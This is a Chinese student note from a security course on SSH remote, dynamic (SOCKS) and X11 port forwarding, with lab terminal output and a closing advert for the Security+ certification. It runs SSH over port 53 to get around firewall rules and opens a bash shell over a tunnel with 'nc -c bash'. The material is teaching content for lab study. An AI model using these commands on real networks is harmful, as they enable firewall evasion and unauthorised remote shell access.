【安全牛学习笔记】SSH远程端口转发和动态端口转发以及X协议转发

来源:互联网 发布:平板电脑win10系统优化 编辑:程序博客网 时间:2024/05/22 00:37

SSH远程端口转发                         

由于ACL等原因,SSH与应用连接建立方向相反

本地端口转发                            

    - SSH客户端+应用客户端位于FW一端    

    - SSH服务器+应用服务端位于另一端    

远程端口转发                            

    - SSH客户端、应用客户端位于FW两端   

    - SSSH服务端、应用服务端位于FW两端

SSH远程端口转发                                               

ssh -fNg -R <listen port>:<remote ip>:<remote prot> user@<SSH

server> -p <ssh server port>                                  

之所以称为远程,是因为SSH侦听端口开在远程的SSH Server上       

侦听端口永远开在应用客户端一方

bodhi@bodhi:~$ netstat -pantu | grep :53

(Not all processes could be identified, non-owned proces info

 will not be shown, you would have to be root to see it all)

tcp        0      0 127.0.1.1:53            0.0.0.0:*         LISTEN      -

tcp        0      0 1.1.1.10:59628          192.168.1.110:53  ESTABLISHED 2435/ssh

tcp        0      0 1.1.1.10:59634          192.168.1.110:53  ESTABLISHED 2448/ssh

tcp        0      0 1.1.1.10:59702          192.168.1.110:53  ESTABLISHED 2893/ssh

tcp        0      0 1.1.1.10:59706          192.168.1.110:53  ESTABLISHED 2898/ssh

tcp        0      0 1.1.1.10:59626          192.168.1.110:53  ESTABLISHED 2431/ssh

udp        0      0 0.0.0.0:5353            0.0.0.0:*                     -

udp        0      0 127.0.0.1:53            0.0.0.0:*                     -

udp6       0      0 :::5353                 :::*                          -

bodhi@bodhi:~$ kill 2435

bodhi@bodhi:~$ kill 2448

bodhi@bodhi:~$ kill 2893

bodhi@bodhi:~$ kill 2898

bodhi@bodhi:~$ kill 2431

bodhi@bodhi:~$ netstat -pantu | grep :53

(Not all processes could be identified, non-owned proces info

 will not be shown, you would have to be root to see it all)

tcp        0      0 127.0.1.1:53            0.0.0.0:*         LISTEN      -

tcp        0      0 1.1.1.10:59628          192.168.1.110:53  TIME_WAIT   -

tcp        0      0 1.1.1.10:59634          192.168.1.110:53  TIME_WAIT   -

tcp        0      0 1.1.1.10:59702          192.168.1.110:53  TIME_WAIT   -

tcp        0      0 1.1.1.10:59706          192.168.1.110:53  TIME_WAIT   -

tcp        0      0 1.1.1.10:59626          192.168.1.110:53  TIME_WAIT   -

udp        0      0 0.0.0.0:5353            0.0.0.0:*                     -

udp        0      0 127.0.0.1:53            0.0.0.0:*                     -

udp6       0      0 :::5353                 :::*                          -

bodhi@bodhi:~$ ssh -CfNg -R 7001:1.1.11:80 root@192.168.1.110 -p 53

bodhi@bodhi:~$ ssh -CfNg -R 7002:1.1.11:3389 root@192.168.1.110 -p 53

root@K:~# service apache2 start

root@K:~# netstat -pantu | grep 7001

tcp        0      0 127.0.0.1:7001        0.0.0.0:*           LISTEN      5213/sshd: root

tcp6       0      0 ::1:7001              :::*                LISTEN      5213/sshd: root   

root@K:~# netstat -pantu | grep 7002

tcp        0      0 127.0.0.1:7002        0.0.0.0:*           LISTEN      5218/sshd: root

tcp6       0      0 ::1:7002              :::*                LISTEN      5218/sshd: root   

root@K:~# rdesktop 127.0.0.1:7002

C:\>nc -nvlp 3333

listening on [any] 3333 ...

connect to [1.1.1.11] from <UNKNOWN> [1.1.1.10] 36822

bodhi@bodhi:~$ ssh -CfNg -R 7003:1.1.11:3333 root@192.168.1.110 -p 53

root@K:~# netstat -pantu | grep 7003

tcp        0      0 127.0.0.1:7003        0.0.0.0:*           LISTEN      5472/sshd: root

tcp6       0      0 ::1:7003              :::*                LISTEN      5472/sshd: root 

root@K:~# nc 127.0.0.1 7003 -c bash

SSH远程端口转发                                 

WEB、RDPNC应用端口转发演示                    

(A) <-> (C)以及(B) <-> (D)之间通信未加密,可嗅探

SSH远程端口转发                               

本地、远程端口转发都需要固定应用服务器IP、Port

    - 应用端口繁多,逐个转发效率低            

    - 某些应用不固定端口                      

    - 某些网站不支持IP直接访问                

    - 使用非受信网络上网时保护流量不被嗅探    

本地侦听socks4/5代理端口                      

    - 由SSH server决定如何转发                

    - 作为翻墙代理使用                        

    - 配置客户端代理(浏览器)                

    - 使用proxychains支持无代理客户端

root@K:~# dig cn.bing.com

; <<>> DiG 9.9.5-12.1-Debian <<>> cn.bing.com

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27086

;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:

; EDNS: version: 0, flags:; MBZ: 0005 , udp: 4096

;; QUESTION SECTION:

;cn.bing.com.IN A

;; ANSWER SECTION:

cn.bing.com.5 IN CNAME cn-bing-com.cn.a-0001.a-msedge.net.

cn-bing-com.cn.a-0001.a-msedge.net. 5 IN CNAMEcn.a-0001.a-msedge.net.

cn.a-0001.a-msedge.net.5 IN A 202.89.233.103

cn.a-0001.a-msedge.net.5 IN A 202.89.233.104

;; AUTHORITY SECTION:

a-msedge.net.5 IN NS ns2.a-msedge.net.

a-msedge.net.5 IN NS ns1.a-msedge.net.

;; ADDITIONAL SECTION:

ns1.a-msedge.net.5 IN A 204.79.197.1

ns2.a-msedge.net.5 IN A 204.79.197.2

;; Query time: 18 msec

;; SERVER: 192.168.23.2#53(192.168.23.2)

;; WHEN: Sun Jun 05 16:24:30 CST 2016

;; MSG SIZE  rcvd: 202

bodhi@bodhi:~$ ssh -CfNg -D 7009 root@192.168.1.110 -p 53

bodhi@bodhi:~$ netstat -pantu | grep 7009

(Not all processes could be identified, non-owned proces info

 will not be shown, you would have to be root to see it all)

tcp        0      0 127.0.0.1:7009        0.0.0.0:*           LISTEN      2946/ssh

tcp6       0      0 ::1:7009              :::*                LISTEN      2946/ss

X协议转发                           

远程登录Linux GUI运行图形化界面工具

    - VNC                           

    - X Windows                     

防火墙限制访问时                    

    - 基于SSHX转发                

    - ssh -X user@1.1.1.1 -p 53

bodhi@bodhi:~$ ssh -X root@192.168.1.110 -p 53    //取得一个shell

root@192.168.1.110's password:

The programs included with the Kali GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /user/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Web May 11 19:09:51 2016 from 19.168.1.123

/usr/bin/xauth:   file /root/ .Xauthority does not exist

root@K:~# ifconfig

root@K:~# gedit

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

原创粉丝点击